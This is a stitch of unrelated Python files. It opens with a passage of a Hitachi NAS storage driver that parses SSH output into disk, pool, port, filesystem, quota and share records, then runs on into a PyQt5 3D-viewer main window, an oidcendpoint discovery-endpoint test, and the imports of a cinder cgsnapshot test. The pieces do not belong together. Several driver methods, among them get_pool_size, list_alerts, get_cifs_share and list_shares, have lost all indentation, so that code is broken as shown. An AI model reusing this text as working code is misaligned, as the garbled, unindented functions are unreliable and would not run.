                    disk_type = disk_map['Type']
                    type_array = disk_type.split(';')
                    model = vendor = version = None
                    # Model/vendor/firmware are present only when 'Type'
                    # has enough ';'-separated segments.
                    if len(type_array) > constant.DISK_INDEX['type_len']:
                        model = \
                            type_array[constant.DISK_INDEX[
                                'model_index']].replace('Model', '')
                        vendor = \
                            type_array[constant.DISK_INDEX[
                                'vendor_index']].replace('Make', '')
                        version = \
                            type_array[constant.DISK_INDEX[
                                'version_index']].replace('Revision', '')
                    # 'Usedinspan' names the owning span (pool), e.g.
                    # "name(...)" -- the parenthesised part is dropped.
                    pool_id = disk_map.get('Usedinspan')
                    serial_number = disk_map['Luid'].split(']')[-1]
                    if pool_id:
                        pool_id = pool_id.split('(')[0]
                    disk_model = {
                        'name': disk_map['HDSdevname'],
                        'storage_id': storage_id,
                        'native_disk_id': disk_map['DeviceID'],
                        'serial_number': serial_number,
                        'manufacturer': vendor,
                        'model': model,
                        'firmware': version,
                        'capacity': int(Tools.get_capacity_size(size)),
                        'status': status,
                        'native_disk_group_id': pool_id
                    }
                    disks_list.append(disk_model)
            return disks_list
        except exception.DelfinException as e:
            err_msg = "Failed to get disk from " \
                      "hitachi nas: %s" % (six.text_type(e.msg))
            LOG.error(err_msg)
            raise e
        except Exception as err:
            err_msg = "Failed to get disk from " \
                      "hitachi nas: %s" % (six.text_type(err))
            LOG.error(err_msg)
            raise exception.InvalidResults(err_msg)
def get_pool_size(self):
size_info = self.ssh_do_exec([constant.POOL_SIZE_COMMAND])
size_array = size_info.split('\r\n')
size_map = {}
pool_name = None
for size in size_array:
if 'Span ' in size:
pool_name = size.split()[-1].replace(':', '')
size_map[pool_name] = 0
if '[Free space]' in size:
free_array = size.split()
if len(free_array) > 2:
free_size = free_array[0].replace('GiB', 'GB')
size_map[pool_name] += Tools.get_capacity_size(free_size)
return size_map
    def get_pool(self, storage_id):
        """Build delfin pool models from the span (pool) table output.

        Total capacity comes from the pool table; free capacity comes
        from get_pool_size(), falling back to the total when a pool has
        no free-space entry.

        :param storage_id: storage identifier stamped on each pool dict
        :raises exception.InvalidResults: on any unexpected parse error
        """
        try:
            pool_info = self.ssh_do_exec([constant.POOL_INFO_COMMAND])
            pool_list = []
            pool_array = self.get_table_data(pool_info)
            size_map = self.get_pool_size()
            for pool in pool_array:
                value_array = pool.split()
                # Only rows with the exact expected column count are pools.
                if len(value_array) == constant.POOL_INDEX['pool_len']:
                    total_capacity = \
                        Tools.get_capacity_size(
                            value_array[constant.POOL_INDEX['total_index']] +
                            'GB')
                    # NOTE(review): the lookup key is the 'free_index'
                    # column; presumably that column holds the span name
                    # used by get_pool_size() -- confirm against CLI output.
                    free_capacity = \
                        size_map.get(
                            value_array[constant.POOL_INDEX['free_index']],
                            total_capacity)
                    status = constants.StoragePoolStatus.NORMAL \
                        if value_array[
                            constant.POOL_INDEX['status_index']] == 'Yes' \
                        else constants.StoragePoolStatus.ABNORMAL
                    pool_model = {
                        'name': value_array[constant.POOL_INDEX['name_index']],
                        'storage_id': storage_id,
                        'native_storage_pool_id': value_array[
                            constant.POOL_INDEX['name_index']],
                        'status': status,
                        'storage_type': constants.StorageType.FILE,
                        'total_capacity': total_capacity,
                        'used_capacity': total_capacity - free_capacity,
                        'free_capacity': free_capacity,
                    }
                    pool_list.append(pool_model)
            return pool_list
        except exception.DelfinException as e:
            err_msg = "Failed to get pool from " \
                      "hitachi nas: %s" % (six.text_type(e.msg))
            LOG.error(err_msg)
            raise e
        except Exception as err:
            err_msg = "Failed to get pool from " \
                      "hitachi nas: %s" % (six.text_type(err))
            LOG.error(err_msg)
            raise exception.InvalidResults(err_msg)
    def list_controllers(self, storage_id):
        """Parse cluster-node listing output into controller models.

        A node is NORMAL when its status column reads 'ONLINE',
        otherwise OFFLINE.

        :param storage_id: storage identifier stamped on each controller
        :raises exception.InvalidResults: on any unexpected parse error
        """
        try:
            controller_list = []
            node_info = self.ssh_do_exec([constant.CONTROLLER_INFO_COMMAND])
            nodes_array = self.get_table_data(node_info)
            for nodes in nodes_array:
                node = nodes.split()
                # Rows shorter than node_len are headers/noise.
                if len(node) > constant.NODE_INDEX['node_len']:
                    status = constants.ControllerStatus.NORMAL \
                        if node[
                            constant.NODE_INDEX[
                                'status_index']] == 'ONLINE' \
                        else constants.ControllerStatus.OFFLINE
                    controller_model = {
                        'name': node[constant.NODE_INDEX['name_index']],
                        'storage_id': storage_id,
                        'native_controller_id': node[
                            constant.NODE_INDEX['id_index']],
                        'status': status
                    }
                    controller_list.append(controller_model)
            return controller_list
        except exception.DelfinException as e:
            err_msg = "Failed to get controllers from " \
                      "hitachi nas: %s" % (six.text_type(e.msg))
            LOG.error(err_msg)
            raise e
        except Exception as err:
            err_msg = "Failed to get controllers from " \
                      "hitachi nas: %s" % (six.text_type(err))
            LOG.error(err_msg)
            raise exception.InvalidResults(err_msg)
    @staticmethod
    def format_alert_list(alert_array, query_para):
        """Fold raw event-log lines into delfin alert dicts.

        Each alert spans several consecutive lines: the main line
        (fields by index), an optional 'CAUSE' line carrying the
        location, and an empty line that flushes the accumulated
        ``alert_model`` into the result list.

        :param alert_array: raw lines from the event-log table
        :param query_para: optional dict with 'begin_time'/'end_time'
            (epoch milliseconds) bounding the accepted occur_time
        :return: list of alert dicts
        """
        alert_list = []
        alert_model = {}
        for alert in alert_array:
            # Main alert line (anything that is not the CAUSE line).
            if alert and 'CAUSE' not in alert:
                alert_data = alert.split()
                # Skip short rows and severities outside SEVERITY_MAP.
                if len(alert_data) > constant.ALERT_INDEX['alert_len'] \
                        and alert_data[
                        constant.ALERT_INDEX['severity_index']] \
                        in constant.SEVERITY_MAP:
                    # Rebuild "<year> <time>" dropping any "+TZ" suffix,
                    # then convert to epoch milliseconds.
                    occur_time = \
                        alert_data[constant.ALERT_INDEX['year_index']] + \
                        ' ' + alert_data[constant.ALERT_INDEX[
                            'time_index']].split("+")[0]
                    occur_time = \
                        int(time.mktime(time.strptime(
                            occur_time, constant.TIME_TYPE))) * 1000
                    if not query_para or \
                            (int(query_para['begin_time'])
                             <= occur_time
                             <= int(query_para['end_time'])):
                        # Everything from field 4 onwards is free text.
                        description = ''
                        for i in range(4, len(alert_data)):
                            description += alert_data[i] + ' '
                        severity = \
                            constant.SEVERITY_MAP.get(
                                alert_data[constant.ALERT_INDEX[
                                    'severity_index']])
                        alert_model['alert_id'] = \
                            alert_data[constant.ALERT_INDEX['id_index']]
                        alert_model['alert_name'] = \
                            alert_data[constant.ALERT_INDEX['id_index']]
                        alert_model['severity'] = severity
                        alert_model['category'] = constants.Category.FAULT
                        alert_model['type'] = \
                            constants.EventType.EQUIPMENT_ALARM
                        alert_model['occur_time'] = occur_time
                        alert_model['description'] = description.lstrip()
                        # Dedup key over id + severity + description.
                        alert_model['match_key'] = \
                            hashlib.md5(
                                (alert_data[constant.ALERT_INDEX['id_index']]
                                 + severity
                                 + description).encode()).hexdigest()
                        alert_model['resource_type'] = \
                            constants.DEFAULT_RESOURCE_TYPE
            # The CAUSE line carries the alert's location after ':'.
            if alert and alert_model and 'CAUSE' in alert:
                alert_data = alert.split(':')
                alert_model['location'] = alert_data[-1]
            # An empty line terminates the current alert block.
            if not alert:
                alert_list.append(alert_model)
                alert_model = {}
        return alert_list
def list_alerts(self, query_para):
try:
command = constant.ALERT_INFO_COMMAND
if query_para and 'begin_time' in query_para:
timeArray = time.gmtime(int(query_para['begin_time']) / 1000)
begin_time = time.strftime("%Y-%m-%d %H:%M:%S", timeArray)
command += constant.ALERT_TIME % begin_time
alert_info = self.ssh_do_exec([command])
alert_array = self.get_table_data(alert_info, True)
alert_list = self.format_alert_list(alert_array, query_para)
alert_list = \
sorted(alert_list,
key=lambda x: x['occur_time'], reverse=True)
return alert_list
except exception.DelfinException as e:
err_msg = "Failed to get alerts from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get alerts from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
    @staticmethod
    def parse_alert(alert):
        """Translate one SNMP trap payload into a delfin alert dict.

        The trap data looks like "<id> <severity> ...: <description>".
        Informational traps are dropped (returns None); malformed
        payloads also fall through and return None.

        :param alert: trap varbind dict keyed by OID
        :raises exception.InvalidResults: on any unexpected failure
        """
        try:
            alert_info = alert.get(constant.OID_TRAP_DATA)
            alert_array = alert_info.split(':')
            if len(alert_array) > 1:
                description = alert_array[1]
                alert = alert_array[0].split()
                if len(alert) > 1:
                    alert_id = alert[0]
                    severity = constant.SEVERITY_MAP.get(alert[1])
                    # Informational traps are intentionally ignored.
                    if severity == constant.SEVERITY_MAP.get('Information'):
                        return
                    alert_model = {
                        'alert_id': alert_id,
                        'alert_name': alert_id,
                        'severity': severity,
                        'category': constants.Category.FAULT,
                        'type': constants.EventType.EQUIPMENT_ALARM,
                        'occur_time': utils.utcnow_ms(),
                        'description': description,
                        # Dedup key over id + severity + description.
                        'match_key': hashlib.md5(
                            (alert_id + severity +
                             description).encode()).hexdigest(),
                        'resource_type': constants.DEFAULT_RESOURCE_TYPE,
                        'location': ''
                    }
                    return alert_model
        except exception.DelfinException as e:
            err_msg = "Failed to parse alert from " \
                      "hitachi nas: %s" % (six.text_type(e.msg))
            LOG.error(err_msg)
            raise e
        except Exception as err:
            err_msg = "Failed to parse alert from " \
                      "hitachi nas: %s" % (six.text_type(err))
            LOG.error(err_msg)
            raise exception.InvalidResults(err_msg)
def list_ports(self, storage_id):
try:
ports_list = self.get_fc_port(storage_id)
return ports_list
except exception.DelfinException as e:
err_msg = "Failed to get ports from " \
"hitachi nas: %s" % (six.text_type(e.msg))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get ports from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
    def get_fc_port(self, storage_id):
        """Parse FC port status/speed CLI output into port models.

        :param storage_id: storage identifier stamped on each port
        :raises exception.InvalidResults: on any unexpected parse error
        """
        try:
            fc_info = self.ssh_do_exec([constant.FC_PORT_COMMAND])
            fc_map_list = \
                self.format_data_to_map(fc_info, 'Portname')
            fc_list = []
            speed_info = self.ssh_do_exec([constant.FC_SPEED_COMMAND])
            speed_map_list = \
                self.format_data_to_map(speed_info, 'FC1')
            # The last map holds the per-port speed entries (FC1, FC2, ...).
            speed_map = speed_map_list[-1]
            for value_map in fc_map_list:
                if 'Portname' in value_map:
                    status = value_map.get('Status')
                    health = constants.PortHealthStatus.ABNORMAL
                    if status == 'Good':
                        health = constants.PortHealthStatus.NORMAL
                    connection_status = \
                        constants.PortConnectionStatus.DISCONNECTED
                    if 'FCLinkisup' in value_map:
                        connection_status = \
                            constants.PortConnectionStatus.CONNECTED
                    # The port number is embedded in a 'HostPortN' key.
                    port_id = ''
                    for key in value_map.keys():
                        if 'HostPort' in key:
                            port_id = key.replace('HostPort', '')
                            break
                    speed = \
                        int(speed_map.get('FC' + port_id).replace('Gbps', ''))
                    fc_model = {
                        'name': 'FC' + port_id,
                        'storage_id': storage_id,
                        'native_port_id': port_id,
                        'connection_status': connection_status,
                        'health_status': health,
                        'type': constants.PortType.FC,
                        'speed': speed * units.G,
                        # NOTE(review): max speed is hard-coded at 8 Gbps;
                        # confirm this holds for all supported models.
                        'max_speed': 8 * units.G,
                        'wwn': value_map.get('Portname'),
                    }
                    fc_list.append(fc_model)
            return fc_list
        except exception.DelfinException as e:
            err_msg = "Failed to get fc ports from " \
                      "hitachi nas: %s" % (six.text_type(e.msg))
            LOG.error(err_msg)
            raise e
        except Exception as err:
            err_msg = "Failed to get fc ports from " \
                      "hitachi nas: %s" % (six.text_type(err))
            LOG.error(err_msg)
            raise exception.InvalidResults(err_msg)
    def list_filesystems(self, storage_id):
        """Combine filesystem detail and status outputs into fs models.

        The status table is first indexed by filesystem id to obtain
        each filesystem's pool and status; the detail table then
        supplies capacities and the thin/thick flag.

        :param storage_id: storage identifier stamped on each filesystem
        :raises exception.InvalidResults: on any unexpected parse error
        """
        try:
            fs_list = []
            fs_info = self.ssh_do_exec([constant.FS_INFO_COMMAND])
            fs_array = self.get_table_data(fs_info)
            status_info = self.ssh_do_exec([constant.FS_STATUS_COMMAND])
            status_array = self.get_table_data(status_info)
            # fs id -> [pool id, raw status].
            status_map = {}
            for status in status_array:
                status_info = status.split()
                if len(status_info) > constant.FS_INDEX['status_len']:
                    status_map[status_info[constant.FS_INDEX['id_index']]] = \
                        [status_info[constant.FS_INDEX['pool_index']],
                         status_info[constant.FS_INDEX['status_index']]]
            for fs in fs_array:
                fs_info = list(filter(None, fs.split(' ')))
                if len(fs_info) > constant.FS_INDEX['detail_len']:
                    # Used/free columns look like "<size>(<pct>)";
                    # keep only the size part.
                    total_capacity = \
                        fs_info[constant.FS_INDEX['total_index']].replace(
                            ' ', '')
                    used_capacity = \
                        fs_info[constant.FS_INDEX['used_index']].replace(
                            ' ', '').split('(')[0]
                    free_capacity = \
                        fs_info[constant.FS_INDEX['free_index']].replace(
                            ' ', '').split('(')[0]
                    total_capacity = Tools.get_capacity_size(total_capacity)
                    used_capacity = Tools.get_capacity_size(used_capacity)
                    free_capacity = Tools.get_capacity_size(free_capacity)
                    # 'No' in the thin-provisioning column means THICK.
                    volume_type = constants.VolumeType.THICK \
                        if fs_info[constant.FS_INDEX['type_index']] == 'No' \
                        else constants.VolumeType.THIN
                    pool_id = status_map.get(fs_info[0])[0] \
                        if status_map.get(fs_info[0]) else None
                    status = status_map.get(fs_info[0])[1] \
                        if status_map.get(fs_info[0]) else None
                    fs_model = {
                        'name': fs_info[1],
                        'storage_id': storage_id,
                        'native_filesystem_id': fs_info[1],
                        'native_pool_id': pool_id,
                        'status': constant.FS_STATUS_MAP[status],
                        'type': volume_type,
                        'total_capacity': total_capacity,
                        'used_capacity': used_capacity,
                        'free_capacity': free_capacity
                    }
                    fs_list.append(fs_model)
            return fs_list
        except exception.DelfinException as e:
            err_msg = "Failed to get filesystem from " \
                      "hitachi nas: %s" % (six.text_type(e.msg))
            LOG.error(err_msg)
            raise e
        except Exception as err:
            err_msg = "Failed to get filesystem from " \
                      "hitachi nas: %s" % (six.text_type(err))
            LOG.error(err_msg)
            raise exception.InvalidResults(err_msg)
def get_fs_evs(self):
fs_info = self.ssh_do_exec([constant.FS_STATUS_COMMAND])
fs_array = self.get_table_data(fs_info)
evs_list = []
for fs in fs_array:
fs_info_array = fs.split()
if len(fs_info_array) > 6:
evs_list.append([fs_info_array[0], fs_info_array[4]])
return evs_list
    def list_quotas(self, storage_id):
        """Collect group/user/tree quotas from every filesystem's EVS.

        For each [fs, evs] pair the EVS context is selected and the
        quota listing parsed; the 'Target' prefix (Group/User/ViVol)
        decides the quota type, and the 'Limit'/'Limit1' fields carry
        capacity and file-count limits tagged '(Soft)' or '(Hard)'.

        :param storage_id: storage identifier stamped on each quota
        :raises exception.InvalidResults: on any unexpected parse error
        """
        try:
            evs_list = self.get_fs_evs()
            quota_list = []
            for evs in evs_list:
                quota_info = self.ssh_do_exec([
                    constant.CHECK_EVS % evs[1],
                    constant.QUOTA_INFO_COMMAND % evs[0]])
                quota_map_list = \
                    self.format_data_to_map(quota_info, 'Usage')
                for quota_map in quota_map_list:
                    quota_type = None
                    user_group_name = None
                    qtree_id = None
                    if 'Target' in quota_map:
                        if 'Group' in quota_map.get('Target'):
                            quota_type = constants.QuotaType.GROUP
                            user_group_name = \
                                quota_map.get('Target').replace('Group', '')
                        elif 'User' in quota_map.get('Target'):
                            quota_type = constants.QuotaType.USER
                            user_group_name = \
                                quota_map.get('Target').replace('User', '')
                        elif 'ViVol' in quota_map.get('Target'):
                            quota_type = constants.QuotaType.TREE
                            user_group_name = \
                                quota_map.get('Target').replace('ViVol', '')
                            qtree_id = evs[0] + '-' + user_group_name
                    # NOTE(review): if 'Target' is absent or matches none
                    # of the branches, quota_type stays None and this
                    # concatenation raises TypeError -- presumably every
                    # row has a recognised Target; confirm.
                    quota_id = \
                        evs[0] + '-' + quota_type + '-' + user_group_name
                    capacity_hard_limit, capacity_soft_limit = None, None
                    file_soft_limit, file_hard_limit = None, None
                    # A hard limit also populates the soft value so both
                    # fields are reported.
                    if 'Soft' in quota_map.get('Limit'):
                        capacity_soft_limit = \
                            quota_map.get('Limit').replace('(Soft)', '')
                    elif 'Hard' in quota_map.get('Limit'):
                        capacity_hard_limit = capacity_soft_limit = \
                            quota_map.get('Limit').replace('(Hard)', '')
                    if 'Soft' in quota_map.get('Limit1'):
                        file_soft_limit = \
                            quota_map.get('Limit1').replace('(Soft)', '')
                    elif 'Hard' in quota_map.get('Limit1'):
                        file_soft_limit = file_hard_limit = \
                            quota_map.get('Limit1').replace('(Hard)', '')
                    quota = {
                        'native_quota_id': quota_id,
                        'type': quota_type,
                        'storage_id': storage_id,
                        'native_filesystem_id': evs[0],
                        'native_qtree_id': qtree_id,
                        "capacity_hard_limit": capacity_hard_limit,
                        'capacity_soft_limit':
                            Tools.get_capacity_size(capacity_soft_limit),
                        "file_hard_limit": file_hard_limit,
                        'file_soft_limit': file_soft_limit,
                        'file_count': quota_map.get('FileCount'),
                        'used_capacity':
                            Tools.get_capacity_size(quota_map.get('Usage')),
                        'user_group_name': user_group_name
                    }
                    quota_list.append(quota)
            return quota_list
        except exception.DelfinException as e:
            err_msg = "Failed to get storage quota from " \
                      "hitachi nas: %s" % (six.text_type(e))
            LOG.error(err_msg)
            raise e
        except Exception as err:
            err_msg = "Failed to get storage quota from " \
                      "hitachi nas: %s" % (six.text_type(err))
            LOG.error(err_msg)
            raise exception.InvalidResults(err_msg)
def list_qtrees(self, storage_id):
try:
evs_list = self.get_fs_evs()
return self.get_qtree(evs_list, storage_id)
except exception.DelfinException as e:
err_msg = "Failed to get storage qtree from " \
"hitachi nas: %s" % (six.text_type(e))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get storage qtree from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
    def get_qtree(self, evs_list, storage_id):
        """List virtual-volume (qtree) entries for each [fs, evs] pair.

        :param evs_list: list of [filesystem_id, evs_id] pairs
        :param storage_id: storage identifier stamped on each qtree
        :return: list of qtree dicts keyed by "<fs>-<name>"
        """
        qtree_list = []
        for evs in evs_list:
            tree_info = self.ssh_do_exec([
                constant.CHECK_EVS % evs[1],
                constant.TREE_INFO_COMMAND % evs[0]])
            tree_map_list = \
                self.format_data_to_map(
                    tree_info, 'root', split_key='<NAME>')
            for qt_map in tree_map_list:
                # Heuristic: the qtree name is the map key that has an
                # empty value (excluding the 'email' field).
                # NOTE(review): relies on format_data_to_map emitting the
                # bare name as a valueless key -- confirm against output.
                qt_name = ''
                for key in qt_map:
                    if qt_map[key] == '' and key != 'email':
                        qt_name = key
                qt_id = evs[0] + '-' + qt_name
                qt_model = {
                    'name': qt_name,
                    'storage_id': storage_id,
                    'native_qtree_id': qt_id,
                    'path': qt_map.get('root'),
                    'native_filesystem_id': evs[0],
                }
                qtree_list.append(qt_model)
        return qtree_list
def get_cifs_share(self, evs_list, storage_id):
share_list = []
evs_array = []
for evs in evs_list:
if evs[1] not in evs_array:
evs_array.append(evs[1])
for evs in evs_array:
cifs_share = self.ssh_do_exec([
constant.CHECK_EVS % evs,
constant.CIFS_SHARE_COMMAND])
cifs_map_list = \
self.format_data_to_map(cifs_share, 'Sharename')
for cifs in cifs_map_list:
qtree_id = None
if 'VirtualVolume' in cifs.get('Sharecomment'):
qtree = cifs.get('Sharecomment').split('Volume')
if cifs.get('Filesystemlabel'):
qtree_id = \
cifs.get('Filesystemlabel') + '-' + qtree[1]
if cifs.get('Filesystemlabel'):
native_share_id = \
'%s-%s-%s' % (cifs.get('Filesystemlabel'),
cifs.get('Sharename'),
constants.ShareProtocol.CIFS),
else:
native_share_id = \
cifs.get('Sharename') + '-' + \
constants.ShareProtocol.CIFS,
share = {
'name': cifs.get('Sharename'),
'storage_id': storage_id,
'native_share_id': native_share_id,
'native_qtree_id': qtree_id,
'native_filesystem_id': cifs.get('Filesystemlabel'),
'path': cifs.get('Sharepath'),
'protocol': constants.ShareProtocol.CIFS
}
share_list.append(share)
return share_list
def get_nfs_share(self, evs_list, storage_id):
share_list = []
evs_array = []
for evs in evs_list:
if evs[1] not in evs_array:
evs_array.append(evs[1])
for evs in evs_array:
nfs_share = self.ssh_do_exec([
constant.CHECK_EVS % evs,
constant.NFS_SHARE_COMMAND])
nfs_map_list = \
self.format_data_to_map(nfs_share, 'Exportname')
qtree_list = self.get_qtree(evs_list, None)
for nfs in nfs_map_list:
qtree_id = None
for qtree in qtree_list:
if nfs.get('Exportpath') == qtree['path'] \
and qtree['native_filesystem_id'] \
== nfs.get('Filesystemlabel'):
qtree_id = qtree['native_qtree_id']
if nfs.get('Filesystemlabel'):
native_share_id = \
nfs.get('Filesystemlabel') \
+ '-' + nfs.get('Exportname') \
+ '-' + constants.ShareProtocol.NFS,
else:
native_share_id = \
nfs.get('Exportname') + '-' +\
constants.ShareProtocol.NFS,
share = {
'name': nfs.get('Exportname'),
'storage_id': storage_id,
'native_share_id': native_share_id,
'native_qtree_id': qtree_id,
'native_filesystem_id': nfs.get('Filesystemlabel'),
'path': nfs.get('Exportpath'),
'protocol': constants.ShareProtocol.NFS
}
share_list.append(share)
return share_list
def list_shares(self, storage_id):
try:
evs_list = self.get_fs_evs()
share_list = []
share_list.extend(self.get_cifs_share(evs_list, storage_id))
share_list.extend(self.get_nfs_share(evs_list, storage_id))
return share_list
except exception.DelfinException as e:
err_msg = "Failed to get storage share from " \
"hitachi nas: %s" % (six.text_type(e))
LOG.error(err_msg)
raise e
except Exception as err:
err_msg = "Failed to get storage share from " \
"hitachi nas: %s" % (six.text_type(err))
LOG.error(err_msg)
raise exception.InvalidResults(err_msg)
|
<filename>src/main.py
import sys
from PyQt5 import QtWidgets, uic
from darktheme.widget_template import DarkPalette
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import Qt
import PyQt5.QtWidgets
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QColorDialog
from PyQt5.QtGui import QColor
from graphic.ui_mainwindow import Ui_MainWindow
from widgets.colordialog import MiniColorDialog
import load.load as load
################################################
from datetime import date
################################################
BACKGROUNDSTRING = "background-color: %s"
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
    """Main application window: wires the UI controls to GL-scene actions."""

    def __init__(self, *args, **kwargs):
        """Build the UI, apply the dark palette, connect signals and
        start the 50 ms refresh timer."""
        super(MainWindow, self).__init__(*args, **kwargs)
        self.setupUi(self)
        self.curColor = QColor(255, 255, 255, 1)
        self.colorWindow = None
        # Held-down state of the WASD movement keys.
        self.translateVec = {key: False for key in ("w", "s", "a", "d")}
        self.setPalette(DarkPalette())
        wiring = (
            (self.loadModelBtn, self.load),
            (self.plusBtn, self.scalePlus),
            (self.minusBtn, self.scaleMinus),
            (self.upBtn, self.moveUp),
            (self.downBtn, self.moveDown),
            (self.rightBtn, self.moveRight),
            (self.leftBtn, self.moveLeft),
            (self.fromBtn, self.moveFrom),
            (self.toBtn, self.moveTo),
            (self.xLeftTurnBtn, self.xLeftRotate),
            (self.xRightTurnBtn, self.xRightRotate),
            (self.yUpTurnBtn, self.yUpRotate),
            (self.yDownTurnBtn, self.yDownRotate),
            (self.colorBtn, self.chooseColor),
        )
        for button, handler in wiring:
            button.clicked.connect(handler)
        timer = QtCore.QTimer(self)
        timer.setInterval(50)
        timer.timeout.connect(self.timerActions)
        timer.start()

    def load(self):
        """Load the demo model, repaint, then show a placeholder alert."""
        load.Load('cube.obj').load()
        self.GL.paintGL()
        QMessageBox.warning(
            self,
            ":(", "Уже "
                  + date.today().strftime('%d.%m.%Y')
                  + "!\nА эта кнопка все ещё не работает!")

    def chooseColor(self):
        """Open the mini color dialog preset to the current color."""
        self.colorWindow = MiniColorDialog(self)
        self.colorWindow.setCurrentColor(self.curColor)
        self.colorWindow.show()

    def timerActions(self):
        """Periodic tick: sync color from the dialog, push state to GL."""
        if self.colorWindow:
            self.curColor = self.colorWindow.currentColor()
            self.colorBtn.setStyleSheet(
                BACKGROUNDSTRING % self.curColor.name())
        self.GL.update(self.curColor.getRgbF(), self.translateVec)

    def scalePlus(self):
        """Zoom the model in one step."""
        self.GL.scale(+1)

    def scaleMinus(self):
        """Zoom the model out one step."""
        self.GL.scale(-1)

    def moveUp(self):
        """Shift the model up along Y."""
        self.GL.translate((0, 0.05, 0))

    def moveDown(self):
        """Shift the model down along Y."""
        self.GL.translate((0, -0.05, 0))

    def moveRight(self):
        """Shift the model right along X."""
        self.GL.translate((0.05, 0, 0))

    def moveLeft(self):
        """Shift the model left along X."""
        self.GL.translate((-0.05, 0, 0))

    def moveFrom(self):
        """Shift the model away along Z."""
        self.GL.translate((0, 0, -0.05))

    def moveTo(self):
        """Shift the model toward the viewer along Z."""
        self.GL.translate((0, 0, 0.05))

    def xLeftRotate(self):
        """Rotate left about the Y axis."""
        self.GL.rotate((0, -1, 0))

    def xRightRotate(self):
        """Rotate right about the Y axis."""
        self.GL.rotate((0, 1, 0))

    def yUpRotate(self):
        """Rotate up about the X axis."""
        self.GL.rotate((-1, 0, 0))

    def yDownRotate(self):
        """Rotate down about the X axis."""
        self.GL.rotate((1, 0, 0))

    def keyPressEvent(self, event):
        """Mark a WASD key as held down."""
        letter = {Qt.Key_W: "w", Qt.Key_S: "s",
                  Qt.Key_A: "a", Qt.Key_D: "d"}.get(event.key())
        if letter is not None:
            self.translateVec[letter] = True

    def keyReleaseEvent(self, event):
        """Mark a WASD key as released."""
        letter = {Qt.Key_W: "w", Qt.Key_S: "s",
                  Qt.Key_A: "a", Qt.Key_D: "d"}.get(event.key())
        if letter is not None:
            self.translateVec[letter] = False
if __name__ == '__main__':
    # Application entry point: create the Qt app, show the main window
    # maximized, and hand control to the Qt event loop.
    app = QtWidgets.QApplication(sys.argv)
    main = MainWindow()
    main.showMaximized()
    sys.exit(app.exec_())
|
import json
import pytest
from oidcmsg.key_jar import build_keyjar
from oidcendpoint.oidc import userinfo
from oidcendpoint.oidc.authorization import Authorization
from oidcendpoint.oidc.provider_config import ProviderConfiguration
from oidcendpoint.oidc.registration import Registration
from oidcendpoint.oidc.token import AccessToken
from oidcendpoint.endpoint_context import EndpointContext
# Key definitions used to build the signing key jar for the test OP.
KEYDEFS = [
    {"type": "RSA", "key": '', "use": ["sig"]},
    {"type": "EC", "crv": "P-256", "use": ["sig"]}
]

# build_keyjar returns several artifacts; index 1 is the KeyJar instance.
KEYJAR = build_keyjar(KEYDEFS)[1]

# Every response_type combination the test provider claims to support.
RESPONSE_TYPES_SUPPORTED = [
    ["code"], ["token"], ["id_token"], ["code", "token"], ["code", "id_token"],
    ["id_token", "token"], ["code", "token", "id_token"], ['none']]

# Static provider metadata advertised by the ProviderConfiguration endpoint.
CAPABILITIES = {
    "response_types_supported": [" ".join(x) for x in RESPONSE_TYPES_SUPPORTED],
    "token_endpoint_auth_methods_supported": [
        "client_secret_post", "client_secret_basic",
        "client_secret_jwt", "private_key_jwt"],
    "response_modes_supported": ['query', 'fragment', 'form_post'],
    "subject_types_supported": ["public", "pairwise"],
    "grant_types_supported": [
        "authorization_code", "implicit",
        "urn:ietf:params:oauth:grant-type:jwt-bearer", "refresh_token"],
    "claim_types_supported": ["normal", "aggregated", "distributed"],
    "claims_parameter_supported": True,
    "request_parameter_supported": True,
    "request_uri_parameter_supported": True,
}
class TestEndpoint(object):
    """Tests for the OIDC provider-configuration (discovery) endpoint."""

    @pytest.fixture(autouse=True)
    def create_endpoint(self):
        """Build an EndpointContext with all standard endpoints and keep
        a ProviderConfiguration endpoint handle for the tests."""
        conf = {
            "issuer": "https://example.com/",
            "password": "<PASSWORD>",
            "token_expires_in": 600,
            "grant_expires_in": 300,
            "refresh_token_expires_in": 86400,
            "verify_ssl": False,
            "capabilities": CAPABILITIES,
            "jwks": {
                'public_path': 'jwks.json',
                'local_path': 'static/jwks.json',
                'private_path': 'own/jwks.json'
            },
            # Endpoint registry: path, implementation class and kwargs.
            'endpoint': {
                'provider_config': {
                    'path': '.well-known/openid-configuration',
                    'class': ProviderConfiguration,
                    'kwargs': {}
                },
                'registration': {
                    'path': 'registration',
                    'class': Registration,
                    'kwargs': {}
                },
                'authorization': {
                    'path': 'authorization',
                    'class': Authorization,
                    'kwargs': {}
                },
                'token': {
                    'path': 'token',
                    'class': AccessToken,
                    'kwargs': {}
                },
                'userinfo': {
                    'path': 'userinfo',
                    'class': userinfo.UserInfo,
                    'kwargs': {'db_file': 'users.json'}
                }
            },
            'template_dir': 'template'
        }
        self.endpoint_context = EndpointContext(conf, keyjar=KEYJAR)
        self.endpoint = ProviderConfiguration(self.endpoint_context)

    def test_do_response(self):
        """The discovery response must be JSON with endpoint URLs derived
        from the issuer."""
        args = self.endpoint.process_request()
        msg = self.endpoint.do_response(args['response_args'])
        assert isinstance(msg, dict)
        _msg = json.loads(msg['response'])
        assert _msg
        assert _msg['token_endpoint'] == 'https://example.com/token'
        assert _msg['jwks_uri'] == 'https://example.com/jwks.json'
        assert ('Content-type', 'application/json') in msg['http_headers']
# Copyright (C) 2012 - 2014 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for cgsnapshot code."""
from unittest import mock
from oslo_serialization import jsonutils
from six.moves import http_client
import webob
